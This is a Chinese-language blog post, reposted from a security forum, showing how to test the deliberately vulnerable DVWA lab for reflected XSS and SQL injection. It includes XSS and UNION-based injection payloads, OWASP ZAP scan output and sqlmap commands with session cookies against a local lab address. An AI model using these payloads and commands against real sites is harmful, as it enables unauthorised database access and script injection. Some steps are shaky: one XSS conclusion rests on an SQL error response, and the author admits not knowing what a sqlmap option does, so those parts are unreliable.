美文网首页sqlmap
关于渗透环境以及渗透工具的使用

关于渗透环境以及渗透工具的使用

作者: 池寒 | 来源:发表于2016-08-08 22:10 被阅读156次

来源:http://bbs.ichunqiu.com/thread-9637-1-1.html?from=ch

实验测试

/vulnerabilities/sqli/?id=1bjupnalert(1)dcwjj&Submit=Submit

返回数据包

ID: 1bjupnalert(1)dcwjj
First name: admin
Surname: admin

可以看出提交的javascript语句被执行 写入页面了 判断为反射型xss跨站

我们看一下他的源代码

// Is there any input?

if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {

// Feedback for end user

echo '

Hello ' . $_GET[ 'name' ] . '
';

}

?>

它只是简单的用了一个if语句判断有没有输入参数 然后将内容echo出来

XSS跨站脚本漏洞原理:

XSS跨站脚本漏洞的产生是由于Web应用程序对用户的输入过滤不如而产生的,攻击者利用网站漏洞把恶意脚本代码(通常包括HTML代码和Javascript脚本)注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者可能采取Cookie资料窃取,会话劫持,钓鱼欺骗等攻击。

接下来我们上Owasp-zap

上Owasp-zap配置好代理,直接把目标URL丢到 active scan模块里。

怎么折腾这里就不详细说了, 直接来看扫描结果

扫描出来了 一个SQL注入 一个XSS跨站。

首先我们来看看sql注入吧

看看他提交的payload数据包 和返回包 判断漏洞是否为误报。

Owasp测试sql注入的payload

/vulnerabilities/sqli/?id=1%27+UNION+ALL+select+NULL+--+&Submit=Submit

返回数据包

he used SELECT statements have a different number of columns

可以看到他查询数据库内容时报错的信息 初步判断出为sql显注。

下面我们来看看xss跨站脚本

出弹窗了。

Owasp测试XSS跨站的payload

/vulnerabilities/sqli/?id=%27%22%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&Submit=Submit

返回数据包

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"alert(1);'' at line 1

可以看出提交的javascript语句被执行 写入页面了 判断为反射型xss跨站。

3.漏洞利用

DVWA Sql注入漏洞Low级

get 注入

注入点:

http://192.168.0.150/vulnerabilities/sqli/?id=1&Submit=Submit

直接上Sqlmap

Sqlmap语句:

python sqlmap.py -u "http://192.168.0.150/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=955sq1mff2p6tis9hc5cieqvu6; security=low" --dbs

-u 指定目标URL

--cookie 指定cookie

--dbs 枚举DBMS中的数据库

因为DVWA是登陆状态所以要加Burp拦截下的cookie 跑数据库名

跑出来了数据库信息 做白帽的话跑到这里就可以去提交漏洞了 不必再往下深入。

DVWA Sql注入漏洞medium级

post注入

我们直接把burp拦截下的数据包保存到桌面 然后sqlmap语句

python sqlmap.py -r /root/桌面/1 --dbs

-r sqlmap加载我们的post请求1.txt文件

DVWA Sql注入漏洞hight级

post注入

我们直接把burp拦截下的数据包保存到桌面 然后sqlmap语句:

python sqlmap.py -r /root/桌面/2 --second-order="http://192.168.0.150/vulnerabilities/sqli/" --dbs

-r  sqlmap加载我们的post请求文件

second-order 啊,这个我也忘了 只是记得是这个参数 有兴趣的小伙伴下去了解了解吧

matesploit渗透我们下期再说吧。

呼呼 可算是写完了,今天的内容就到这里啦 感谢大家的收看。。。

L0ne1y

相关文章

网友评论

  • e52127b0fa49:非常详细的教程,作者多劳多得,收徒弟吗?

本文标题:关于渗透环境以及渗透工具的使用

本文链接:https://www.haomeiwen.com/subject/uwbrsttx.html